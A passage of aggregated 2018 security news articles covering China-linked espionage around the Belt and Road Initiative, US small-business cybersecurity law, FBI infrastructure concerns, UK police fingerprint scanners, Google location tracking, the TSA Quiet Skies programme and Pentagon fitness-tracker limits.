Threat actors based in China continued to target computers around the world through 2017, including systems belonging to the DOD and other U.S. government agencies, with a focus on accessing networks and extracting information.

“China can use the information to benefit China’s defense high-technology industries, support China’s military modernization, provide the [Chinese Communist Party] insights into U.S. leadership perspectives, and enable diplomatic negotiations, such as those supporting China’s Belt and Road Initiative,” the DOD says in its report. “Additionally, targeted information could enable PLA cyber forces to build an operational picture of U.S. defense networks, military disposition, logistics, and related military capabilities that could be exploited prior to or during a crisis. The accesses and skills required for these intrusions are similar to those necessary to conduct cyber operations in an attempt to deter, delay, disrupt, and degrade DoD operations prior to or during a conflict.”

China’s Belt and Road project (BRI) is a driver of regional cyber threat activity
20.8.2018 securityaffairs BigBrothers

Security experts have observed increasing cyber espionage activity related to China’s Belt and Road Initiative (BRI).
The warning comes from experts at the cybersecurity firms FireEye and Recorded Future.

China’s Belt and Road Initiative (BRI) is a development project for building infrastructure that connects countries in Southeast Asia, Central Asia, the Middle East, Europe, and Africa.

For this reason, the project is of strategic interest to almost any intelligence agency.

FireEye calls it a “driver of regional cyber threat activity”; its experts warn of a spike in espionage operations aimed at gathering information on the project.

Cyber spies are already targeting organizations from various sectors that are involved in the project.

“Cyber espionage activity related to the initiative will likely include the emergence of new groups and nation-state actors. Given the range of geopolitical interests affected by this endeavor, it may be a driver of emerging nation-state cyber actors to use their capabilities,” reads a report published by FireEye.

FireEye uncovered an espionage campaign carried out by the China-linked APT group dubbed Roaming Tiger.

Roaming Tiger was first documented by experts at ESET in 2014; in December 2015 researchers uncovered a further cyber espionage campaign by the group aimed at Russian organizations.

The APT group targeted entities in Belarus using specially crafted documents that referenced the Chinese infrastructure project as a bait.

FireEye observed the use of several malicious codes against organizations involved in the BRI project.

Chinese hackers used the TOYSNAKE backdoor to target several European foreign ministries. According to FireEye, the BANECHANT malware was used against the Maldives, a strategic center for BRI-related financial investment, while the LITRECOLA malware was used in attacks against Cambodia and the SAFERSING malware was involved in campaigns against international NGOs.

Experts also mentioned the recent attacks powered by the TEMP.Periscope group on the maritime industry.

“We expect BRI will also highlight the capabilities of emerging cyber actors across Asia and the Middle East and under what norms such nation-states sponsors will employ their capabilities,” FireEye said in its report. “Prior FireEye iSIGHT Intelligence reporting has noted that rising regional cyber actors, such as Vietnam, have been willing to employ their espionage capabilities against foreign corporations conducting business inside their borders. Similarly, there may be a willingness for other nation-state actors to aggressively target private sector organizations contributing to BRI.”

Researchers at Recorded Future also reported several attacks originating from China, specifically from an IP address belonging to Tsinghua University.

The attackers targeted the Tibetan community as well as many governments and private sector organizations worldwide.

The activity from the Tsinghua IP address also targeted Mongolia, Kenya, and Brazil, which “are key investment destinations as part of China’s Belt and Road Initiative.”

“During the course of our research, we also observed the Tsinghua IP scan ports and probe government departments and commercial entities networks in Mongolia, Kenya, and Brazil. Each of these countries are key investment destinations as part of China’s Belt and Road Initiative.” states the report published by Recorded Future.

“We assess with medium confidence that the consistent reconnaissance activity observed from the Tsinghua IP probing networks in Kenya, Brazil, and Mongolia aligns closely with the BRI economic development goals, demonstrating that the threat actor using this IP is engaged in cyberespionage on behalf of the Chinese state.”


The appendix in the PDF report published by Recorded Future includes a full list of the associated indicators of compromise.

China's 'Belt and Road Initiative' Drives Cyber Spying
17.8.2018 securityweek BigBrothers

Cybersecurity firms have observed increasing cyber espionage activity related to China’s Belt and Road Initiative, and researchers expect to see more of these operations in the upcoming period.

China’s Belt and Road Initiative (BRI) is a trillion-dollar development project focused on building infrastructure connecting roughly 70 countries across Asia, Europe and Africa.

Intelligence-focused cybersecurity firms Recorded Future and FireEye this week warned of attacks apparently coming from China and related to the BRI.

FireEye believes that the project will be a “driver of regional cyber threat activity”. Based on historic activity, the company expects threat actors to target organizations in the government, academic, energy, transportation, construction, manufacturing, mining and financial sectors.

FireEye says it has already seen evidence of an increase in cyber espionage operations related to the BRI.

“Cyber espionage activity related to the initiative will likely include the emergence of new groups and nation-state actors. Given the range of geopolitical interests affected by this endeavor, it may be a driver of emerging nation-state cyber actors to use their capabilities,” FireEye said in a report provided to customers and shared with SecurityWeek.

One of the campaigns spotted by FireEye that may be related to the BRI was conducted by a China-linked threat group dubbed Roaming Tiger, which has been known to target high profile organizations in Russia and former Soviet Union countries. Some recent Roaming Tiger attacks aimed at Belarus attempted to deliver malware using specially crafted documents that referenced the Chinese infrastructure project. Belarus is one of the countries targeted by the Belt and Road Initiative.

Other China-linked campaigns observed by FireEye that appear related to the BRI involved the TOYSNAKE backdoor targeting multiple European foreign ministries; the BANECHANT malware targeting Maldives, which has been a focal point of development and financial investments related to BRI; the LITRECOLA malware targeting Cambodia, which is a vital node in the Belt and Road network; the SAFERSING malware targeting international NGOs; and the TEMP.Periscope group targeting the maritime industry.

“We expect BRI will also highlight the capabilities of emerging cyber actors across Asia and the Middle East and under what norms such nation-states sponsors will employ their capabilities,” FireEye said in its report. “Prior FireEye iSIGHT Intelligence reporting has noted that rising regional cyber actors, such as Vietnam, have been willing to employ their espionage capabilities against foreign corporations conducting business inside their borders. Similarly, there may be a willingness for other nation-state actors to aggressively target private sector organizations contributing to BRI.”

A report published on Thursday by Recorded Future details several attack campaigns apparently originating from the Tsinghua University, an elite Chinese academic institution.

The attacks have been aimed at the Tibetan community and various government and private sector organizations around the world.

Researchers noted that some of the countries targeted in attacks originating from this university, specifically Mongolia, Kenya, and Brazil, “are key investment destinations as part of China’s Belt and Road Initiative.”

“We assess with medium confidence that the consistent reconnaissance activity observed from the Tsinghua IP probing networks in Kenya, Brazil, and Mongolia aligns closely with the BRI economic development goals, demonstrating that the threat actor using this IP is engaged in cyberespionage on behalf of the Chinese state,” Recorded Future said in its report.

U.S. and Chile Agree to Cooperate on Cyber Security
17.8.2018 securityweek BigBrothers

SANTIAGO, Chile (AP) — U.S. Defense Secretary Jim Mattis and his Chilean counterpart have signed an agreement pledging closer cooperation in combating cyber threats.

Mattis and Defense Minister Alberto Espina held a signing ceremony Thursday after meeting to discuss a range of security issues, including military exercises and cooperation in science and technology. Cyber defense is a topic of growing interest throughout the Western Hemisphere. Banco de Chile, one of the country's biggest commercial banks, has said a hacking operation robbed it of $10 million in June.

Santiago was the fourth stop for Mattis on a tour of South America that began in Brasilia on Sunday. He also visited Rio de Janeiro and Buenos Aires and is scheduled to hold talks in Bogota, Colombia, on Friday.

NIST Small Business Cybersecurity Act Becomes Law
16.8.2018 securityweek BigBrothers

The NIST Small Business Cybersecurity Act Aims to Provide Cyberdefense Resources

U.S. President Donald Trump signed the NIST Small Business Cybersecurity Act, S. 770 (formerly known as the MAIN STREET Cybersecurity Act) into law on Tuesday (August 14, 2018). It requires NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

The resources to be provided are informational. They must be generally applicable to a wide range of small businesses; vary with the nature and size of small businesses; promote cybersecurity awareness and workplace cybersecurity culture; and include practical application strategies. The resources must further be technology-neutral and compatible with COTS solutions; and as far as possible consistent with international standards and the Stevenson-Wydler Technology Innovation Act of 1980.

Use of these resources by small businesses is voluntary.

The bi-partisan act was authored by U.S. Senators Brian Schatz (D-Hawai'i) and James Risch (R-Idaho), and co-sponsored by Senators John Thune (R-S.D.), Maria Cantwell (D-Wash.), Bill Nelson (D-Fla.), Cory Gardner (R-Colo.), Catherine Cortez Masto (D-Nev.), Maggie Hassan (D-N.H.), Claire McCaskill (D-Mo.), and Kirsten Gillibrand (D-N.Y.).

"As businesses rely more and more on the internet to run efficiently and reach more customers, they will continue to be vulnerable to cyberattacks. But while big businesses have the resources to protect themselves, small businesses do not, and that's exactly what makes them an easy target for hackers," said Schatz, lead Democrat on the Commerce Subcommittee on Communications Technology, Innovation, and the Internet, in a statement. "This new law will give small businesses the tools to firm up their cybersecurity infrastructure and fight online attacks."

The act has been well-received by the security industry.

"Bills focusing on the cybersecurity needs of small businesses are becoming increasingly necessary to protect activity crucial to the U.S. economy," explains Jessica Ortega, a member of the SiteLock research team. "Small businesses account for 99.7% [SBA figures] of employers in the United States and as many as 50% [CNBC figures] of those have experienced a cyberattack. Not surprising when you consider that websites are attacked as many as 50 times per day on average [SiteLock's own figures]."

She adds, "The NIST Small Business Cybersecurity Act aims to provide cyberdefense resources for small businesses by creating a set of guidelines for basic security measures that should be easy to follow and implement affordably. It also creates guidelines for making security best practices a required component of corporate training and workplace culture, something that is very needed as cyberthreats continue to evolve."

Small businesses, and many large organizations, struggle to comply with the existing NIST Cybersecurity Framework. "This change sets the stage for greater compliance and readiness from smaller organizations who previously thought that NIST compliance was too costly or complex to obtain," adds Dr. Bret Fund, founder and CEO at SecureSet.

The basic problem is small organizations cannot afford extensive cybersecurity resources in-house, while many still believe they will not be a target for cyber attackers. "Small businesses are not immune to threats, and are often not equipped with the IT resources or personnel to protect their networks," warns Dirk Morris, chief product officer at Untangle. Small businesses are a major direct target for business email compromise (BEC) and ransomware attacks (https://www.securityweek.com/ransomware-where-its-been-and-where-its-going); and as part of the supply chain for larger organizations they are targeted for both credential theft and island-hopping to the larger target.

Counterintuitively, small businesses suffer more from a successful attack than do the larger companies. "In fact," suggests Anupam Sahai, Vice President of Product Management at Cavirin, "recent reports show that smaller businesses lose proportionately more to cyberattacks since they are targeted just as often, and are less able to recover due to less resilient infrastructures."

The same report highlighted by Sahai also points out that smaller companies paying lower salaries have a proportionately higher number of grey hats working for them, making them more susceptible to insider threats.

While the security industry generally applauds this new act, it still suffers from one major drawback -- use of the new NIST resources by small businesses is voluntary.

"I will be curious to see how this plan is carried out," says Francis Dinha, CEO and co-founder of OpenVPN. "Many small businesses neglect cyber security because they aren't aware and don't understand the risks -- so, they don't seek out solutions. But if they're not seeking out solutions now, what makes anyone think they will seek out these new NIST resources?"

The act, he says, "does not seem to specify how to connect or engage with small businesses in these practices. It only requires NIST to make resources, in the form of guidelines, methodologies, and other information, available online. I'm concerned this won't be enough. If small businesses aren't engaged in a more active way, they may miss this opportunity and remain at risk."

A complaint often heard at SecurityWeek from harassed CISOs is, "If it's not a regulation, it won't happen." Perhaps what is required as a next step is a small business cybersecurity framework that can be audited. Larger organizations can then insist that smaller companies they engage must show compliance to the NIST small business cybersecurity framework -- but even that will create problems. Small companies with great new ideas will continue to develop their idea without intrinsic security -- and the larger companies will have to choose between a great new non-conformant idea and an older conformant solution.

This new act is a great help in assisting those small businesses that wish to improve their cybersecurity to do so. But it needs to be made a requirement before it will seriously improve the overall cybersecurity posture of the nation.

Senate Passes MAIN STREET Cybersecurity Act for Small Business
16.8.2018 securityweek BigBrothers

The U.S. Senate passed the MAIN STREET Cybersecurity Act on Sept. 28, 2017. The bill requires NIST to "disseminate clear and concise resources to help small business concerns identify, assess, manage, and reduce their cybersecurity risks."

Co-sponsored by Senators Maria Cantwell (D-WA), Brian Schatz (D-HI), James Risch (R-ID), John Thune (R-SD) and Bill Nelson (D-Fla.), and introduced in March 2017, MAIN STREET's full title is 'Making Available Information Now to Strengthen Trust and Resilience and Enhance Enterprise Technology Cybersecurity Act of 2017'.

The basic requirement is that NIST shall provide cybersecurity resources specifically geared for small businesses (SMEs). Those resources are to promote awareness of simple, basic controls; a workplace cybersecurity culture; and third-party stakeholder relationships, in order to assist SMEs in mitigating common cybersecurity risks. The resources are to be technology-neutral and implementable using commercial off-the-shelf technologies.

They are to be consistent with the requirements of the Cybersecurity Enhancement Act of 2014, which gave more weight and support to the NIST Cybersecurity Framework. While widely used by large organizations, the NIST framework is usually ignored by SMEs.

In a statement of support for MAIN STREET issued in March, Sen. John Thune, chairman of the Senate Committee on Commerce, Science, and Transportation, pointed out that SMEs provide more than half of all jobs in the U.S., but are unprepared for the effect of cyberattacks. According to figures from the National Cybersecurity Alliance, 60% of small businesses are forced to close following an attack.

"Cyberattacks can have catastrophic effects on small businesses and their customers," he said. "This legislation offers important resources, specifically meeting the unique needs of small businesses, to help them guard sensitive data and systems from thieves and hackers."

"In 2012, nearly 71 percent of cyberattacks occurred in businesses with fewer than 100 employees," said Senator Risch. "These attacks seriously compromise not only the businesses, but also their employees' and customers' personal information. As we work to reduce our nation's cyber vulnerabilities, we must be equally mindful of our responsibility to uniformly educate all small business owners on how to deter these threats."

The small business version of the NIST Framework will need to provide a cybersecurity framework that does not require the high level of investment needed for the full NIST Framework. However, like the full version, it will be voluntary for business. Whether SMBs actually derive practical benefit remains to be seen.

The Ponemon 2016 State of Cybersecurity in SMBs survey found that 50% of small businesses had suffered a data breach in the previous 12 months. SMEs are clearly a target for cybercriminal attacks, but are unprepared to stop them. The primary reasons are twofold: SMEs often think they are too small to be a target, and that effective security can only be achieved with the resources of a large organization.

The first is simply wrong: small businesses are increasingly targeted for extortion (such as ransomware) and credential theft (especially where that business might be part of the supply chain of larger organizations). It is hoped that the new small business Cybersecurity Act will change the second.

A survey of 1,420 small business owners published in March 2017 by Manta suggests that only 69% of small business owners currently have controls in place to prevent hacks -- meaning 1 in 3 small business owners have no safeguards in place. Where controls are used, they tend to be basic: such as antivirus software (17%), firewalls (16%), and spam filters (14%).

"Overall," concludes Manta, "with the growth in hackers targeting small businesses, owners should invest more heavily in cyber defense to prevent attacks, which can often be more crippling for a small business than a large corporation."

Andy Halataei, Senior Vice President for Government Affairs of the Information Technology Industry Council, said at the time the bill was introduced, "Small businesses often don't have the resources they need to guard against sophisticated cyber-attacks, and this legislation can be the helping hand small businesses need to help reduce their cybersecurity risks." He added, "By offering small businesses federal agencies' resources and coordinated support, they can better manage risks, protect customer privacy, and focus on growing their ventures."

The reality for small businesses today is that they face threats from both criminals and government legislation. Legal regulatory requirements, like common cybercriminals, do not differentiate hugely between large and small businesses. For example, any business of whatever size that does business with a member state of the European Union will be subject to the strict requirements of the European General Data Protection Regulation (GDPR) by May 2018.

The MAIN STREET Cybersecurity Act of 2017 will hopefully help SMEs protect themselves from both hackers and regulators. It is expected that this Act will rapidly pass through the final stages to become law.

FBI Eyes Plethora of River-Related Threats
15.8.2018 securityweek BigBrothers

NEW ORLEANS (AP) — Giant cranes loading and unloading gargantuan barges. Oil tankers, supply vessels and pipelines serving a vital energy industry. Flood control structures. Chemical plants. Cruise ships. Drinking water sources. All computer-reliant and tied in some way to the internet. All of them vulnerable to cyber thieves, hackers and terrorists.

Roughly nine months into his job as special agent in charge of the New Orleans office of the FBI, agent Eric Rommal is keenly aware of the dangers cyber-criminals pose to Mississippi River-related businesses and south Louisiana infrastructure.

"Louisiana is a major cyber vulnerability area," Rommal told The Associated Press in an interview.

"Every time that we have a vessel that travels up or down the Mississippi River there's a vulnerability: that that vessel or persons on those vessels may in fact be doing harm to our systems," said Rommal. "And that affects the national economy and affects the entire United States."

Rommal, accompanied by Matthew Ramey, who supervises the office's cyber squad, and Drew Watts, an assistant special agent in charge, discussed a litany of vulnerable areas and the ways the FBI in New Orleans works to protect them.

"When it relates to commerce and the economy throughout the United States, oil and gas — it all starts here," said Rommal. "And when those systems are compromised, it doesn't just affect Louisiana. It affects the entire nation."

A cyber disruption of security systems that protect pipelines and refineries "could essentially cripple the oil and gas industry until we could get that system up and running again," said Rommal.

Energy isn't the only concern.

"The ports that are along the Mississippi River — many may think of them as an agricultural or a petroleum depot. But what we need to know more about is that each one of those systems is controlled by sort of computer network that allows barges to be off-loaded, loaded," he said.

A hacker disrupting those operations could effectively disrupt nationwide and international commerce, he said, until it could be manually restored.

Ports and the businesses that use them are susceptible to theft of money or critical information, Ramey said. And the theft can be state-sponsored.

"That would be, say, the Chinese, the Russians, the Iranians, the North Koreans, want to compromise the ports for, say, some sort of economic or secretive information. The maritime and the port industry are susceptible to what we call BEC — business email compromises," Ramey said.

"Wire transfers are going out all the time, 24/7. If the attacker can insert himself into that email chain, they can assume the identity of the person who controls that account." And that can lead to money being diverted to unintended sources.

FBI statistics show some 41,000 victims lost $2.9 billion to cyber-thieves nationally from October 2013 to May 2018, said Ramey. Over $5 million left the state in 2017 due to cyber-thieves, he said, adding: "In 2018, we're on track to surpass that."

Offshore there are drilling rigs and production platforms. Inland, refineries and chemical plants line the river. Compromise of their computer systems and safety systems could lead to disaster, Rommal said.

"We're confident that the internal security systems owned by each one of those companies have mitigation plans to prevent terrible disasters from happening," he said. "But, nonetheless, it's something that we think about every day."

In addition, the agents acknowledged threats to public utilities — New Orleans, for instance, draws its drinking water from the river — and various flood-control structures and pumping systems.

Rommal said more than 20 people working for the FBI headquarters in Louisiana are working on cyber security.

They include experts working at forensics labs, doing forensics on computer hard drives and developing techniques for analyzing computer memories in efforts to fight and find intruders.

And, Rommal said, there are partnerships with other federal agencies, including a joint effort known as the National Cyber Investigative Joint Terrorism Task Force.

There is also the national InfraGard, an FBI program that enlists thousands of private-industry partners from potential cybercrime target sectors, such as transportation, energy, banking and infrastructure. Ramey said there are 800 members in Louisiana.

Participants can provide and receive real-time information on imminent cyber threats.

The FBI also maintains a website for its Internet Crime Complaint Center. It's a mechanism for businesses and individuals to report cybercrime, and a source of information on the ever-evolving threat.

"We're not in this fight alone," said Rommal. "And it is a fight."

UK Police Deploy Homemade Mobile Fingerprint Scanners
15.8.2018 securityweek BigBrothers

The UK Metropolitan Police Service -- the Met, the UK's largest police force and one of the largest in the world -- has introduced a new portable fingerprint scanner. This is not the first portable scanner used by the Met, but differs from the earlier option by being developed in-house.

Known as INK (identity not known), it combines software produced in-house by Met staff with an Android mobile phone paired with a Cross Match Technologies fingerprint reader. The device communicates securely with the Home Office Biometric Services Gateway (BSG), which then searches the Criminal Records Office (IDENT1) and immigration enforcement (IABS) databases.

If a suspect has a criminal record, the Met says, or is known to immigration enforcement, his or her identity can be confirmed at the roadside. An officer, with relevant access levels, can also use the device to check the Police National Computer to establish if they are currently wanted for any outstanding offences.

The statement made it clear that all fingerprints taken on the device are deleted automatically once the officer logs off the device. The 2017 Vault 7 CIA documents leaked by WikiLeaks seem to indicate that the CIA used a tool called ExpressLane to surreptitiously collect biometric data recorded by other Cross Match devices in the U.S.

Miami-based Cross Match Technologies provides biometric management systems to law enforcement and governments. In 2011 it was reported that a Cross Match device was used to identify Osama Bin Laden, allowing then president Obama to announce his death.

For now, the Met devices cannot be used to increase the size of the national fingerprint database regardless of whether the subject is convicted of a crime. However, there seems little to prevent this development in the future.

The Police and Criminal Evidence Act 1984 (PACE) allows fingerprints to be taken if a constable reasonably suspects the subject of committing or attempting to commit an offence, or they have committed or attempted to commit an offence, and: the name of the person is unknown to, and cannot be readily ascertained by, the constable -- or if the constable has reasonable grounds for doubting whether a name given by the person is their real name.

Again under PACE, fingerprints may be stored by the police for 2-3 years (more if the courts grant an extension) or indefinitely if the subject is subsequently convicted of an offense. However, it is worth noting that European attitudes towards fingerprinting are changing. In April 2018, the European Commission proposed that all identity cards held by European citizens should be required to include a digital image of the holder's fingerprints.

The driving force behind the new scanners is, however, economy of both police funds and officers' time. Project lead Superintendent Adrian Hutchinson explained, "Mobile identification technology helps officers to do their jobs efficiently and effectively. For example, if police stop a driver for a traffic violation but the driver has no documents on him and the car is registered to another person officers may not be happy that the name given is correct. INK can allow them to confirm the identity to allow the service of a summons, rather than arrest them and take them to a police station where they then confirm their identity. Also, if the person is wanted for other offences, this device will allow us to establish this at the point they are stopped."

The reduced cost of the new devices will allow the Met to increase their usage from less than 100 to 600 devices in the field, to be rolled out over the next six months. It is believed that the failure rate for a scanned fingerprint is around one in 7,000.

It is not immediately clear whether this is the same device that was described by the West Yorkshire Police earlier this year. On 10 February, the Home Office announced, "An app on an officer's phone, combined with a handheld scanner, will mean police will be able to check fingerprints against both criminal and immigration records by connecting to the two live databases (IDENT1 and IABS) via the new Biometric Services Gateway... It is expected that another 20 forces across the country will roll out the system by the end of this year."

A Westminster press conference that would answer such details, scheduled for Tuesday was canceled following an incident at Westminster on Monday evening. A vehicle was driven at speed into crash barriers outside the Houses of Parliament, injuring several pedestrians and cyclists. It is being treated as terror-related and investigated by the Met's counter-terrorism police -- who have said that the identity of the driver is not yet confirmed.

Google tracks users’ movements even if they have disabled the “Location History” on devices
14.8.2018 securityaffairs BigBrothers

According to the AP, many Google services on both Android and iPhone store records of user location even if the users have disabled the “Location History”.

According to a recent investigation conducted by the Associated Press, many Google services on both Android and iPhone devices store records of user location data, and they do so even when the user has disabled “Location History” on the device.

When a user disables “Location History” in the privacy settings of Google applications, this should prevent Google from storing location data.

The reality is different: the AP found that even when users have turned off Location History, some Google apps automatically store “time-stamped location data” without explicit authorization.

“Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.”

That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking. (It’s possible, although laborious, to delete it.)” reads the post published by AP.

“For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are,”

“And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude—accurate to the square foot—and save it to your Google account.”

The AP used location data from an Android smartphone with ‘Location History’ disabled to map the movements of Princeton postdoctoral researcher Gunes Acar.

Data plotted on the map includes records of Dr. Acar’s train commute on two trips to New York and visits to the High Line park, Chelsea Market, Hell’s Kitchen, Central Park and Harlem; other markers on the map include Acar’s home address.

“The privacy issue affects some two billion users of devices that run Google’s Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.” continues the AP.

Google replied to the study conducted by the AP with the following statement:

“There are a number of different ways that Google may use location to improve people’s experience, including Location History, Web and App Activity, and through device-level Location Services. We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time.”

Jonathan Mayer, a Princeton researcher and former chief technologist for the FCC’s enforcement bureau, remarked that every place where Google keeps location history should stop recording when users switch off Location History:

“If you’re going to allow users to turn off something called ‘Location History,’ then all the places where you maintain location history should be turned off. That seems like a pretty straightforward position to have.”

The good news is that it is possible to stop Google from saving these location markers: the “Web & App Activity” setting must be turned off as well. Turning off Location History alone only keeps your movements out of the timeline; Google continues to store the other location markers until Web & App Activity is also paused.

Open your web browser, go to myactivity.google.com, select “Activity Controls” and turn off both “Web & App Activity” and “Location History”.

The device-level controls below limit which apps can read the device’s location at all; they are separate from the account-level settings above, so both should be reviewed.

For Android devices:
Go to the “Security & location” setting, select “Privacy”, tap “Location” and toggle it off.

For iOS devices:
Google Maps users can go to Settings → Privacy → Location Services and change the app’s location setting to ‘While Using the App’.

Google Tracks Your Movements, Like It or Not
13.8.2018 securityweek BigBrothers

Google wants to know where you go so badly that it records your movements even when you explicitly tell it not to.

An Associated Press investigation found that many Google services on Android devices and iPhones store your location data even if you've used privacy settings that say they will prevent it from doing so.

Computer-science researchers at Princeton confirmed these findings at the AP's request.

For the most part, Google is upfront about asking permission to use your location information. An app like Google Maps will remind you to allow access to location if you use it for navigating. If you agree to let it record your location over time, Google Maps will display that history for you in a "timeline" that maps out your daily movements.

Storing your minute-by-minute travels carries privacy risks and has been used by police to determine the location of suspects — such as a warrant that police in Raleigh, North Carolina, served on Google last year to find devices near a murder scene. So the company will let you "pause" a setting called Location History.

Google says that will prevent the company from remembering where you've been. Google's support page on the subject states: "You can turn off Location History at any time. With Location History off, the places you go are no longer stored."

That isn't true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking.

For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are. And some searches that have nothing to do with location, like "chocolate chip cookies," or "kids science kits," pinpoint your precise latitude and longitude — accurate to the square foot — and save it to your Google account.

The privacy issue affects some two billion users of devices that run Google's Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.

Storing location data in violation of a user's preferences is wrong, said Jonathan Mayer, a Princeton computer scientist and former chief technologist for the Federal Communications Commission's enforcement bureau. A researcher from Mayer's lab confirmed the AP's findings on multiple Android devices; the AP conducted its own tests on several iPhones that found the same behavior.

"If you're going to allow users to turn off something called 'Location History,' then all the places where you maintain location history should be turned off," Mayer said. "That seems like a pretty straightforward position to have."

Google says it is being perfectly clear.

"There are a number of different ways that Google may use location to improve people's experience, including: Location History, Web and App Activity, and through device-level Location Services," a Google spokesperson said in a statement to the AP. "We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time."

To stop Google from saving these location markers, the company says, users can turn off another setting, one that does not specifically reference location information. Called "Web and App Activity" and enabled by default, that setting stores a variety of information from Google apps and websites to your Google account.

When paused, it will prevent activity on any device from being saved to your account. But leaving "Web & App Activity" on and turning "Location History" off only prevents Google from adding your movements to the "timeline," its visualization of your daily travels. It does not stop Google's collection of other location markers.

You can delete these location markers by hand, but it's a painstaking process since you have to select them individually, unless you want to delete all of your stored activity.

You can see the stored location markers on a page in your Google account at myactivity.google.com, although they're typically scattered under several different headers, many of which are unrelated to location.

To demonstrate how powerful these other markers can be, the AP created a visual map of the movements of Princeton postdoctoral researcher Gunes Acar, who carried an Android phone with Location history off, and shared a record of his Google account.

The map includes Acar's train commute on two trips to New York and visits to The High Line park, Chelsea Market, Hell's Kitchen, Central Park and Harlem. To protect his privacy, The AP didn't plot the most telling and frequent marker — his home address.

Huge tech companies are under increasing scrutiny over their data practices, following a series of privacy scandals at Facebook and new data-privacy rules recently adopted by the European Union. Last year, the business news site Quartz found that Google was tracking Android users by collecting the addresses of nearby cellphone towers even if all location services were off. Google changed the practice and insisted it never recorded the data anyway.

Critics say Google's insistence on tracking its users' locations stems from its drive to boost advertising revenue.

"They build advertising information out of data," said Peter Lenz, the senior geospatial analyst at Dstillery, a rival advertising technology company. "More data for them presumably means more profit."

The AP learned of the issue from K. Shankari, a graduate researcher at UC Berkeley who studies the commuting patterns of volunteers in order to help urban planners. She noticed that her Android phone prompted her to rate a shopping trip to Kohl's, even though she had turned Location History off.

"So how did Google Maps know where I was?" she asked in a blog post.

The AP wasn't able to recreate Shankari's experience exactly. But its attempts to do so revealed Google's tracking. The findings disturbed her.

"I am not opposed to background location tracking in principle," she said. "It just really bothers me that it is not explicitly stated."

Google offers a more accurate description of how Location History actually works in a place you'd only see if you turn it off — a popup that appears when you "pause" Location History on your Google account webpage. There the company notes that "some location data may be saved as part of your activity on other Google services, like Search and Maps."

Google offers additional information in a popup that appears if you re-activate the "Web & App Activity" setting — an uncommon action for many users, since this setting is on by default. That popup states that, when active, the setting "saves the things you do on Google sites, apps, and services ... and associated information, like location."

Warnings when you're about to turn Location History off via Android and iPhone device settings are more difficult to interpret. On Android, the popup explains that "places you go with your devices will stop being added to your Location History map." On the iPhone, it simply reads, "None of your Google apps will be able to store location data in Location History."

The iPhone text is technically true if potentially misleading. With Location History off, Google Maps and other apps store your whereabouts in a section of your account called "My Activity," not "Location History."

Since 2014, Google has let advertisers track the effectiveness of online ads at driving foot traffic, a feature that Google has said relies on user location histories.

The company is pushing further into such location-aware tracking to drive ad revenue, which rose 20 percent last year to $95.4 billion. At a Google Marketing Live summit in July, Google executives unveiled a new tool called "local campaigns" that dynamically uses ads to boost in-person store visits. It says it can measure how well a campaign drove foot traffic with data pulled from Google users' location histories.

Google also says location records stored in My Activity are used to target ads. Ad buyers can target ads to specific locations — say, a mile radius around a particular landmark — and typically have to pay more to reach this narrower audience.

While disabling "Web & App Activity" will stop Google from storing location markers, it also prevents Google from storing information generated by searches and other activity. That can limit the effectiveness of the Google Assistant, the company's digital concierge.

Sean O'Brien, a Yale Privacy Lab researcher with whom the AP shared its findings, said it is "disingenuous" for Google to continuously record these locations even when users disable Location History. "To me, it's something people should know," he said.

Quiet Skies, TSA surveillance program targets Ordinary U.S. Citizens

11.8.2018 securityaffairs BigBrothers

Journalists revealed a new, previously undisclosed surveillance program that targets US citizens, code named ‘Quiet Skies’.
According to the Transportation Security Administration (TSA), which has acknowledged the existence of Quiet Skies, the program has monitored about 5,000 U.S. citizens on domestic flights in recent months.

Quiet Skies was criticized by privacy advocates because the authorities have begun monitoring U.S. citizens that aren’t suspected of a crime or of involvement in terrorist organizations.

The domestic surveillance program aims at collecting extensive information about the movements of the citizens and their behaviour.

“The previously undisclosed program, called ‘Quiet Skies,’” specifically targets travelers who “are not under investigation by any agency and are not in the Terrorist Screening Data Base,” states a bulletin issued in March by the TSA.

The Agency is monitoring individuals who have spent a certain amount of time in specific countries or who have visited those countries within a certain period of time; a reservation that includes email addresses or phone numbers associated with terrorism suspects could also trigger monitoring.

Passengers remain on the Quiet Skies watch list “for up to 90 days or three encounters, whichever comes first, after entering the United States,” according to the TSA. Travelers are not notified when they have been added to the watch list.

Every day about 40 to 50 people on domestic flights are selected under the Quiet Skies program and on average, air marshals follow and monitor about 35 of them.

Quiet Skies program (Source: atlantamusic.us)

This type of surveillance activity is very expensive and, according to the experts, it drains resources from other vital activities.

At this time there are no data on the cost of the program or on whether it has allowed authorities to neutralize any threat.

“Since this initiative launched in March, dozens of air marshals have raised concerns about the Quiet Skies program with senior officials and colleagues, sought legal counsel, and expressed misgivings about the surveillance program, according to interviews and documents reviewed by the Globe.”

Privacy advocates and experts on civil liberties consider the Quiet Skies program worrisome and potentially illegal.

Further details on the program are reported in the article titled “Quiet Skies – A TSA Surveillance Program Targets Ordinary U.S. Citizens” that I have published on the Infosec Institute website.

Pentagon Restricts Use of Fitness Trackers, Other Devices
7.8.2018 securityweek  BigBrothers

WASHINGTON (AP) — Military troops and other defense personnel at sensitive bases or certain high-risk warzone areas won't be allowed to use fitness-tracker or cellphone applications that can reveal their location, according to a new Pentagon order.

The memo, obtained by The Associated Press, stops short of banning the fitness trackers or other electronic devices, which are often linked to cellphone applications or smart watches and can provide the users' GPS and exercise details to social media. It says the applications on personal or government-issued devices present a "significant risk" to military personnel, so those capabilities must be turned off in certain operational areas.

Under the new order, military leaders will be able to determine whether troops under their command can use the GPS function on their devices, based on the security threat in that area or on that base.

"These geolocation capabilities can expose personal information, locations, routines, and numbers of DOD personnel, and potentially create unintended security consequences and increased risk to the joint force and mission," the memo said.

